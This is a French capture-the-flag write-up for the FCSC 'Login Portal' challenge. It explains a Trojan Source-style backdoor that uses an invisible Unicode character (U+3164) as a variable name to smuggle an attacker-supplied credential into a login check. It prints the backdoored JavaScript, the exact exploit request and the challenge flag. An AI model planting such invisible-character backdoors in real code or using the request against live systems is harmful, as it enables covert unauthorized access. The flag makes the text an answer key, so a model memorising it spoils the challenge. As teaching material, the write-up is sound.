# Login Portal

Vous travaillez dans une petite entreprise où un employé, Mr. Martin, a récemment été licencié. Le responsable informatique a constaté des intrusions dans le portail de login et est persuadé que Mr. Martin a fait un sale coup avant de partir en modifiant le code source de l'application. Tous les mots de passe des utilisateurs ont été changés, mais les intrusions continuent. On vous demande de comprendre comment.

https://login-portal.france-cybersecurity-challenge.fr/

**Solution**

Probablement une des épreuves les plus faciles de cette édition ! À
condition d'avoir le bon éditeur de code. 😉

Le site offre un formulaire de connexion, et un accès au code source :

![website](website.png)

Le code source intégral est [ici](source.js), et en l'ouvrant sous VSCode, on a tout de suite quelque chose qui choque:
![code](code.png)

Que sont ces espaces jaunâtres ? Via un éditeur hexa, on se rend compte qu'il ne s'agit évidemment pas d'espaces, mais du caractère Unicode `U+3164` (codé `e3 85 a4`) appelé `HANGUL FILLER`. 

Il s'agit en fait [d'une attaque connue](https://www.bleepingcomputer.com/news/security/invisible-characters-could-be-hiding-backdoors-in-your-javascript-code/) depuis des années, mais qui a rebondit fin 2021 lors de la publication du papier [Trojan Source](https://www.bleepingcomputer.com/news/security/trojan-source-attack-method-can-hide-bugs-into-open-source-code/) qui décrivait une version plus subtile encore. Le principe général est en fait d'utiliser des caractères Unicode (en principe) invisibles pour altérer un code source et cacher une backdoor. Une des contre-mesures est justement, pour les éditeurs de texte, de mettre en lumière ces caractères, comme le fait VScode.

En l'occurrence, qu'est-ce que permettent ces deux caractères bizarres ? Pour les interpréteurs et compilateurs, ils sont tout à fait autorisés, et donc en l'occurrence, c'est comme si ce caractère était une variable. Si on la renomme dans le code source par, au hasard, `backdoor` :

```js
const { username, password, backdoor} = req.query;

// We changed all those passwords after Mr. Martin left the company
const validUsers = [
    'admin:W7tgTzWTFBDedWf+OhrrqfLgYAh7blYh0RuhakKLKqQ=',
    'alice:K9gGyX8OAK8aH8Myj6djqSaXI8jbj6xPk69x2xhtbpA=',
    'bob:WsOfjLfA9phADg4FnzcUrtKOXc4hByHUsBpX02PvrSM=',
    backdoor
];
```

On se rend donc compte qu'il y a un quatrième utilisateur autorisé à se connecter au portail, et que son couple login/mot de passe provient... de la requête elle-même !

Donc, on doit pouvoir obtenir un accès à l'appli si on fait un appel avec les paramètres :
- `username=admin`
- `pasword=plop`
- `backdoor=admin:base64(sha256("plop"))`

Évidemment, ici le paramètre backdoor devra être spécifié sous son vrai nom Unicode, et donc URLencodé. Et ainsi :
`GET /login?username=admin&password=plop&%E3%85%A4=admin:GElhlzBVEN8ir3Y1B8mSGeoI4IQUODrhq/HLFW2WGgM=` fonctionne:
![flag](flag.png)

Le flag est `FCSC{01122d1073f9d97090af9c7a53723a5c21a8946990afed9aa2557102b7771cde}`